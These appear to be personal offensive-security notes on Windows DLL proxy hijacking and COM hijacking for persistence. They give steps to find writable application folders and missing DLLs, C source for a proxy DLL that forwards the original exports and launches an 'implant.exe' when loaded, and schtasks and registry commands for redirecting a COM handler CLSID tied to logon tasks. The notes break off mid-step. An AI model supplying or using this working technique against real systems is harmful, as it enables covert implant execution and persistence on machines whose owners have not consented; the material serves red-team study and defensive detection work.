identify a candidate; either a service or scheduled task that runs, could also be within the \RUN reg key. Download the executable home folder and execute to get the DLL that are executed.
check icacls within the directory to check if you can modify the path, presented as a (M)
Look for a DLL that doesn't exist in your local path, can use procmon then filter based on 'result CONTAINS "NOT FOUND"' and 'Process Name CONTAINS "Application_Name"'.
Additionally, use 'dumpbin /exports original.dll' to see what is called and what libraries they include. The pragma comment needs to be performed for all the calls to ensure the app works properly.
Create DLL:
// Add a linker to the original DLL:
// the first, is for OpenPrinterA which is called using HEX 8F (143 decimal) goes after the @
// decimal can be translated in python "python -c print(int(0x8f), int(0x4d), int(0x1d))"
// update the linker to all calls
#pragma comment(linker,"/export:DLL_CALL_HERE=winsplhlp.DLL_CALL_HERE,@143")
#pragma comment(linker,"/export:DLL_CALL_HERE=winsplhlp.DLL_CALL_HERE,@79")
#pragma comment(linker,"/export:DLL_CALL_HERE=winsplhlp.DLL_CALL_HERE,@29")
// if the call doesn't have a function, (i.e. NONAME) use the #100 (100 = the ordinal name)
#pragma comment(linker,"/export:NONAME=winsplhlp.#100,@100,NONAME")
#include <Windows.h>
void Go(void) {
STARTUPINFO info={sizeof(info)};
PROCESS_INFORMATION processInfo;
CreateProcess(
"c:\\Windows\\Tasks \\implant.exe",
"", NULL, NULL, TRUE, 0, NULL, NULL,
&info, &processInfo);
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
Go();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
copy the new dll and the original DLL and rename is to 'winsplhlp.dll' then place within the application folder.
COM-Based hijacking/proxying:
com objects referenced by GUIDs and can live on remote machine. When an app calls functions to a dll, calls SCM for the guid, queries local (machine and user) registry (HKEY_CLASSES_ROOT -> \SOFTWARE\CLASSES\CLSID). If found, loads the DLL. Can edit the \Software\CLASSES hive under user.
Can also be implemented as EXE files (process loading), still looks at the reg, tags the EXE starts a new process and the com-object lives in that process. called via RPC
If a remote machine, will be called SCM as remote, same as RPC
check scheduled tasks:
schtasks.exe /query /xml > tasks.xml
within the <Actions></Actions> sections, look for <ComHandler></ComHandler> and within the <Triggers></Triggers> look for persistence mechanisms i.e. logon. Once you have identified, query the CSID:
reg query "HKCR\CLSID\{123123123-1231-2123-1231-2312312312}"
reg query "HKCR\CLSID\{123123123-1231-2123-1231-2312312312}\service"
# or could be in local machine:
reg query "HKLM\Software\Classes\CLSID\{123123123-1231-2123-1231-2312312312}\Service"
# or could be in current user:
reg query "HKCU\Software\Classes\CLSID\{123123123-1231-2123-1231-2312312312}\Service"
# export:
reg export "HKCU\Software\Classes\CLSID\{123123123-1231-2123-1231-2312312312}\Service" C:\Windows\Temp
Update the exported registry to reflect the area where you want to store the new file. i.e. instead of 'HKEY_LOCAL_MACHINE' change to 'HKEY_CURRENT_USER'. also update the path of the DLL/EXE and save the file, then upload: